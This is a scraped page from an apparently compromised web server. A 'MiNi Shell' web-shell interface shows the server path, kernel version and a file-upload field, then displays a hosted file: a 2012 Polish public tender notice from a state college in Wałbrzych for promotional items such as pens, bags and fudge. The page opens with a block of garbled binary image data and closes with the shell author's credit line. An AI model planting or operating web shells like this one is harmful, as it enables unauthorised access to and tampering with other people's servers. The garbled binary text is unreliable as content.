JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120323/91580-N-2012.html

<p class="kh_header"><b>Wałbrzych: Wykonanie i dostawa materiałów promocyjnych</b><br>
<b>Numer ogłoszenia: 91580 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa w Wałbrzychu , ul. Zamkowa 4, 58-300 Wałbrzych, woj. dolnośląskie, tel. 074 6419200, faks 074 6419202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pwsz.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i dostawa materiałów promocyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostarczenie do siedziby Zamawiającego materiałów reklamowych wskazanych w załączniku nr 8 do SIWZ zgodnych z wymaganiami określonymi w opisie przedmiotu zamówienia. 
1. Zakres zamówienia obejmuje:
- wykonanie materiałów reklamowych zgodnie z wymaganiami techniczno-ilościowymi zawartymi w załączniku nr 8 do SIWZ,
- dostawę materiałów reklamowych do siedziby Zamawiającego. Wszystkie dostawy będą odbywały się na koszt Wykonawcy,
- umieszczenie na materiałach reklamowych wymaganych przez Zamawiającego nadruków zgodnie z wytycznymi opisanych w złączniku nr 8, odpowiednio wyeksponowanych i widocznych.  
2. Warunki realizacji i odbioru przedmiotu zamówienia.  
-  Przed przystąpieniem do produkcji docelowej materiałów objętych przedmiotem zamówienia Wykonawca przedstawi Zamawiającemu do akceptacji po jednym egzemplarzu każdego z produktów,
- Zamawiający w terminie 3 dni roboczych od dnia doręczenia przez Wykonawcę próbek zamawianych materiałów reklamowych, dokona ich  akceptacji lub zgłosi poprawki lub modyfikacje,
- W  przypadku wniesienia  przez Zamawiającego  poprawek  lub modyfikacji, Wykonawca 
uwzględniając je przedstawi Zamawiającemu w terminie 3 dni od dnia zgłoszenia poprawek lub modyfikacji, poprawione próbki materiałów reklamowych,
- Zamawiający w terminie 3 dni roboczych od dnia doręczenia przez Wykonawcę poprawionych lub  zmodyfikowanych próbek, dokona ostatecznej akceptacji lub wniesie poprawki lub modyfikacje,
- Zamawiający z tytułu wprowadzenia zmian nie ponosi żadnych dodatkowych kosztów.
3.  Przedmiot umowy będzie realizowany zgodnie z następującym harmonogramem:  
1) termin wykonania i dostarczenia przedmiotu zamówienia:
- pozycje od 1 do 24 załącznika nr 8 do SIWZ - 20 dni kalendarzowych licząc od dnia ostatecznej akceptacji wzorów przedstawionych Zamawiającemu,
- pozycja 25 załącznika nr 8 do SIWZ -  20 dni kalendarzowych licząc od dnia podpisania umowy dla pierwszej partii, przy czym Zamawiający zastrzega sobie prawo do zamówienia krówek maksymalnie w pięciu partiach. Termin ważności dla każdej partii - 6 m-cy liczony od daty przekazania Zamawiającemu każdej partii krówek. Termin realizacji dla każdej następnej partii wynosi 10 dni kalendarzowych po otrzymaniu przez Wykonawcę zamówienia.
5. Wszystkie materiały powinny spełniać następujące kryteria:  
-  Funkcjonalności tj. spełniać swoje przeznaczenie.  
-  Estetyki i precyzji wykonania:  
a) nie mogą występować zarysowania, przebarwienia, pęknięcia, ewentualnie inne uszkodzenia widoczne gołym okiem,
b) poszczególne części materiału muszą być dobrze do siebie dopasowane, zamocowane, zszyte, sklejone itp.,  
c) graficzne elementy nie mogą być starte, rozmazane, popękane ani nie mogą zmieniać kolorów w odniesieniu do zaakceptowanych wzorów,  
d) krawędzie muszą być wykończone w sposób nie niosący niebezpieczeństwa skaleczeń  
8. Dostarczane materiały będą spełniały wymagania Zamawiającego, jeżeli ich jakość będzie odpowiadać co najmniej jakości materiałów tzw. próbnych, zatwierdzonych do produkcji przez Zamawiającego.  
Uwagi:  
Kolory, z których wykonane są poszczególne materiały reklamowe mają być w jednakowym odcieniu.
Szczegółowy opis przedmiotu zamówienia
Nadruk logo Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa, nazwa Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa, adres internetowy www.pwsz.com.pl , lub szkic budynku Uczelni- łącznie lub wybrane elementy do uzgodnienia.
1.	 Zakreślacz trójkąt
Rodzaj: plastikowy zakreślacz-marker w kształcie trójkąta, 3 kolory: żółty, różowy, zielony 
Wymiary: 8x8x1,2 cm
Kolor: biały
Nadruk: wymiar 34x40 mm
Kolor nadruku; 1 kolor ,tampodruk
Ilość : 1500 szt.
2.	Linijka 14 cm z przyborami
Rodzaj: otwierana plastikowa linijka  z karteczkami  samoprzylepnymi : 3 różnokolorowe bloczki z wąskimi karteczkami i 1 bloczek jednokolorowy oraz z  kolorowe  spinacze( nie mniej niż 10 szt.)
Wymiary: 150x60x8 mm
Kolor linijki :  czerwony, czarny, niebieski
Nadruk: wymiar 30x40 mm
Kolor nadruku; 1 kolor , tampodruk
Ilość : 500 szt.
3.	Układanka drewniana zapakowana w bawełniany woreczek
Rodzaj: Układanka logiczna wykonana z drewna,  zapakowana w bawełniany woreczek 
Wymiary: 40x40x40 mm
Kolor układanki:  drewno
Kolor woreczka: biały
Nadruk : na bawełnianym woreczku wymiar 50x50 mm
Kolor nadruku na bawełnianym woreczku :1 kolor , sitodruk
Ilość : 100 szt.
4.	Karty do gry i kości
Rodzaj: Karty do gry ( 2 talie x 54 karty) i kości ( 5 szt.)ułożone w drewnianym trójdzielnym pudełku 
Materiał: drewno sheesham, mosiądz
Wymiary opakowania: 38x200x120 mm
Nadruk : wymiar 25x50 mm
Kolor nadruku:1 kolor , grawerowanie laserem GD
Ilość : 70 szt.
5.	Notes z długopisem 
Rodzaj: Notes w czarnej oprawie zawierający białe kartki (nie mniej niż 70 ), zestaw  różnokolorowych karteczek samoprzylepnych zawierający 5 wąskich różnokolorowych karteczek i  jeden bloczek jednokolorowy (nie mniej niż 25 karteczek każdy) oraz długopis
Wymiary: 138x120x18 mm
Materiał: karton, papier
Kolor: czarny
Nadruk: wymiar 30x65 mm
Kolor nadruku; 1 kolor ,tampodruk
Ilość : 200 szt.
6.  Komplet upominkowy
Rodzaj: komplet upominkowy zawierający wizytownik,  brelok i długopis  zapakowany w czarne kartonowe pudełko
Wymiary pudełka: 32x148x180 mm 
Materiał: ekoskóra, metal
Nadruk na wizytowniku, breloku i długopisie
Kolor nadruku; 1 kolor , grawerowanie laserem GD
Ilość : 200 szt.
7.	Klip do notatek
Rodzaj:  przezroczysty uchwyt do notatek z metalowym klipem
Wymiary: 2,3x10,8x2,3 cm
Kolor: neutralny, czerwony, granatowy, jasnozielony
Materiał: acrylic, metal
Nadruk: wymiar 15x15 mm
Kolor nadruku; 1 kolor ,tampodruk
Ilość : 500 szt.
8.	Długopis 
Rodzaj: automatyczny długopis z niebieskim wkładem
Wymiary: 135x11 mm
Kolor: mix kolorów-min 6 kolorów
Materiał : tworzywo
Nadruk: wymiar 6x40 mm
Kolor nadruku; 1 kolor, tampodruk
Ilość : 3500 szt.
9.	Torebka Eko 
Rodzaj: Wykonana z bawełny, ekologiczna torba  na zakupy
Wymiary: 260x220 mm
Materiał: polipropylen 90g na m2
Nadruk: wymiar 100x150 mm
Kolor nadruku; 1 kolor , sitodruk
Ilość : 200 szt.
10.	Plecak
Rodzaj: dwukolorowy sportowy plecak zapinany na zamek
Wymiary: 400x370x130 mm
Kolor: błękitny-szary, czarny-szary, jasnozielony-szary
Materiał: poliester
Nadruk: wymiar 80x100 mm
Kolor nadruku; 1 kolor ,sitodruk
Ilość : 200 szt.
11.	Notesik A5
Rodzaj: notatnik formatu A5 (100 kartek)  z zakładką i elastyczna nylonową opaską do zamykania . Pakowany w worek foliowy.
Wymiary: 9x14x1,3 cm
Materiał: PU, papier
Kolor: mix kolorów-min 8 kolorów
Nadruk: wymiar 40x40 mm
Kolor nadruku; 1 kolor ,tampodruk
Ilość : 500 szt.
12.	Teczka konferencyjna A5
Rodzaj: Teczka konferencyjna A5 wykonana ze skóry PU. Teczka zwiera dwa uchwyty na długopis  (wewnątrz i zewnątrz teczki), notes formatu A5- 30 stron w linie i dwie przegródki. Pakowana pojedynczo w torebkę foliową.
Wymiary: 18x23,5x1,8 cm
Kolor: czarny
Nadruk: wymiar 50x30 mm
Kolor nadruku; 1 kolor ,sitodruk
Ilość : 100 szt.
13.	 Worek sportowy
Rodzaj:  Poliestrowy worek sportowy zamykany za pomocą sznureczków
Wymiary: 37x40,5 cm
Materiał: poliester
Kolor: mix kolorów-min 6 kolorów
Nadruk: wymiar 200x200 mm
Kolor nadruku; 1 kolor , sitodruk
Ilość : 500 szt.
14.	Torba na laptopa
Rodzaj: Czarna torba na laptopa 13,3 cala, dodatkowa kieszeń zapinana na zamek błyskawiczny 
Wymiary: 36x27x5,3 cm
Kolor:  czarny
Nadruk: wymiar 100x150 mm
Kolor nadruku; 1 kolor ,termo transfer
Ilość : 100 szt.
15.	Układanka plastikowa
Rodzaj: gra zręcznościowa w kształcie sześcianu, zestaw zawiera 24 różne układanki
Wymiary: 4x4x4 cm
Materiał: plastik, metal
Nadruk: wymiar 30x30 mm
Kolor nadruku; 1 kolor ,tampodruk
Ilość : 500 szt.
16.	 Pendrive
Rodzaj: Pamięć USB w czarnej zamykanej zabudowie, wykonanej z plastiku  zapakowana w kartonik. Pojemność pamięci 4 GB
Wymiary:  6,03 x 2,38 x 1,22cm
Kolor: czarny
Nadruk: wymiar 17x7 mm
Kolor nadruku; 1 kolor ,tampodruk
Ilość : 100 szt.
17.	Linijka
Rodzaj: linijka wykonana z matowego plastiku, służy jako otwieracz do listów na końcu klips z magnesem
Wymiary: 16,8 x 3,2 x 0,4cm
Kolor: mix kolorów
Nadruk: wymiar 30x10 mm
Kolor nadruku; 1 kolor ,tampodruk
Ilość : 3500 szt.
18.	Piłka antystresowa
Rodzaj: piłeczka antystresowa wypełniona plastikowymi granulkami 
Wymiary:  o 5,0 cm
Kolor: mix kolorów-nie mniej niż 4
Nadruk: wymiar 30x15 mm
Kolor nadruku; 1 kolor ,tampodruk
Ilość : 1000 szt.
19.	Kubek
Rodzaj: biały ceramiczny kubek o pojemności ok. 300 ml z kolorowym wnętrzem
Wymiary: 9x o 8,4 cm
Kolor: biały
Nadruk: wymiar 40x40 mm
Kolor nadruku na ceramice: 1 kolor 
Ilość : 300 szt.
 20.  Brelok-otwieracz
Rodzaj: brelok-otwieracz do butelek w obudowie ze szronionego  plastiku 
Wymiary: 6,5x4,5x1 cm
Kolor: mix kolorów
Nadruk: wymiar 20x20 mm
Kolor nadruku; 1 kolor ,tampodruk
Ilość : 3500 szt.
21.	Reklamówka
Rodzaj: reklamówka foliowa z zakładka górną i dolną
Wymiary: 40x50 cm
Kolor: biały, szary
Nadruk: wymiar format A4 jednostronny
Kolor nadruku; 1 kolor ,sitodruk
Rodzaj folii: LDPE, grubość: 50 mikronów
Uchwyt: market
Ilość : 1000 szt.
22.	Torba A4 ze sznurkami
Rodzaj: targowa, promocyjna torba A4 z sznurkami
Wymiary: 26x39x10 cm
Kolor: granatowy
Nadruk: wymiar 80x80 mm
Kolor nadruku; 1 kolor ,tampodruk lub sitodruk
Ilość : 2500 szt.
23.	Smycz reklamowa
Rodzaj: poliestrowa smycz reklamowa o długości  80 cm zakończona sznureczkiem na telefon komórkowy, plastikowym łącznikiem i karabińczykiem
Wymiary: 2,5x80 cm
Kolor:  mix kolorów
Nadruk: wymiar 15x200 mm
Kolor nadruku; 1 kolor ,sublimacja
Ilość : 3500 szt.
24.	Stojak na telefon komórkowy
Rodzaj:  stojak na telefon komórkowy
Wymiary: 79x64x65 mm
Materiał: tworzywo, metal
Kolor: czarny, srebrny
Nadruk: wymiar 10x40 mm
Kolor nadruku; 1 kolor ,tampodruk lub grawerowanie laserem GD
Ilość : 300 szt.
25.	Krówka reklamowa
Rodzaj: krówka mleczna reklamowa zawijana w etykietę wykonaną zgodnie z wymogami PWSZ
Kolor: biały, granatowy, żółty
Ilość : 50 kg.
Zamawiający zastrzega sobie prawo do zamówienia krówek maksymalnie w pięciu partiach. Termin ważności dla każdej partii - 6 m-cy liczony od daty przekazania Zamawiającemu każdej partii krówek. Termin realizacji dla każdej następnej partii wynosi 10 dni kalendarzowych po otrzymaniu przez Wykonawcę zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby niniejszego zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia przez wykazanie realizacji przynajmniej dwóch zamówień polegających na dostawie materiałów reklamowych itp. o wartości nie mniejszej niż 40 000,00 zł brutto każde - zgodnie z załącznikiem nr 6 do SIWZ. Do wykazu należy załączyć dokumenty potwierdzające, że zamówienia te zostały wykonane lub są wykonywane należycie- np. referencje</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pwsz.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa, 58-300 Wałbrzych ul. Zamkowa 4, pok. nr 301.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2012 godzina 10:00, miejsce: Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa, 58-300 Wałbrzych ul. Zamkowa 4, pok. nr 301.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com